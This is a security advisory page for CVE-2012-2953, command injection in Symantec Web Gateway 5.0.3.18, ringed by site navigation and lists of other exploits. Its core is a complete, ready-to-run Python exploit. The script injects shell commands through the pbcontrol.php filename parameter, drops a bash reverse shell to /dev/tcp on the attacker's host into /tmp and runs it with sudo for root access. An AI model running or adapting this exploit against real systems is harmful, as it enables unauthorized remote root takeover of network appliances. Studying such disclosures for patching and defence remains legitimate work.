Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Confidence 2013

5% Off any SANS course
Use Code: SecuriTeam_5

Hack In Paris

La Nuit du Hack

Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner

Symantec's Web Gateway management console is susceptible to multiple security issues that include remote command execution, local file inclusion, arbitrary password change and SQL injection security issues.

Credit:
The information has been provided by muts.

Free Website Security Scan	Free Fuzzer Report	Vulnerability Assessment
Detect web app vulnerabilities	University study comparing the top	Accurate and automated scanning
Get guidance from professionals.	6 commercially availble fuzzers.	for networks of any size.

Protect your website!
Free Trial, Nothing to install.
No interruption of visitors.
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
*Symantec Web Gateway 5.0.3.18

#!/usr/bin/python
import urllib
import sys

'''
print "[*] ##############################################################"
print "[*] Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit"
print "[*] Offensive Security - http://www.offensive-security.com"
print "[*] ##############################################################\n"
'''
if (len(sys.argv) != 4):
print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>"
exit(0)

rhost = str(sys.argv[1])
lhost = sys.argv[2]
lport = sys.argv[3]

payload= '''echo%20'%23!%2Fbin%2Fbash'%20%3E%20%2Ftmp%2FnetworkScript%3B%20echo%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F'''+lhost+'''%2F'''+lport+'''%200%3E%261'%20%3E%3E%20%2Ftmp%2FnetworkScript%3Bchmod%20755%20%2Ftmp%2FnetworkScript%3B%20sudo%20%2Ftmp%2FnetworkScript'''
url = 'https://%s/spywall/pbcontrol.php?filename=hola";%s;"&stage=0' % (rhost,payload)
urllib.urlopen(url)

CVE Information:
2012-2953

Disclosure Timeline:
Published: 2012-07-24

blog comments powered by Disqus

	SimplyPlay v.66 .pls File Buffer Overflow Exploit
	NProtect Anti-Virus Privilege Escalation Vulnerability
	Ripe HD FLV Player Plugin for WordPress Multiple Script Direct Request Path Disclosure Vulnerability
	CMS snews SQL Injection Vulnerability
	WeBid SQL Injection Exploit
	Invision Gallery SQL Injection Exploit
	ArrowChat External.php Lang Parameter Traversal Local File Inclusion Exploit
	WinWebMail Server Stored XSS Exploit
	TFTP Server for Windows ST WRQ Buffer Overflow Exploit
	QNX QCONN Remote Command Execution Exploit
	Distinct TFTP Writable Directory Traversal Execution Exploit
	Xion Audio Player 1.0.127 (.aiff) Denial of Service Exploit
	Wordpress Postie Plugin Stored XSS Exploit
	Vice City Multiplayer Server Remote Code Execution Exploit
	Sphpforum Multiple Exploits
	NetOp Remote Control Client Buffer Overflow Exploit
	MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Exploit
	MaxForum Local File Inclusion Exploit
	Inferno vBShout SQL Injection Vulnerability
	WP Effective Lead Management Persistent XSS Exploit

Featured Articles

	Social Engine Multiple Exploits
	Novell Groupwise Address Book Remote Code Execution Exploit
	GWebmail XSS & LFI RCE Vulnerabilities
	Acpid Privilege Boundary Crossing Exploit
	McAfee Virtual Technician MVT.MVTControl.6300 ActiveX GetObject() Vulnerability
	'SonicWall Global Management System XSS Vulnerability'
	'Opera file:// Overflow'
	'vxFtpSrv CWD Command Overflow'
	'Kaminsky DNS Cache Poisoning Flaw Exploit for Domains'
	'freeSSHD Post Authentication Buffer Overflow (Exploit)'
	'Symantec Altiris Client Service Local Privilege Escalation (Exploit)'
	'Apple Mac OS X SMB Vulnerabilities (mount_smbfs and smbutil)'
	'SurgeMail Webmail Host Header DoS'
	'PHP Win32std Extension safe_mode/disable_functions Protections Bypass'
	'WinPcap NPF.SYS Privilege Elevation Vulnerability (PoC exploit)'
	'MailEnable Buffer Overflow (LOGIN, Exploit)'
	'Durian Web Application Server Buffer Overflow (Exploit)'
	'KsIRC Buffer Overflow Exploit (PRIVMSG)'
	'Allied Telesyn AT-TFTP Server Filename Buffer Overflow (Exploit)'
	'Windows WorkStation NetpManageIPCConnect (MS06-070, Exploit)'

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs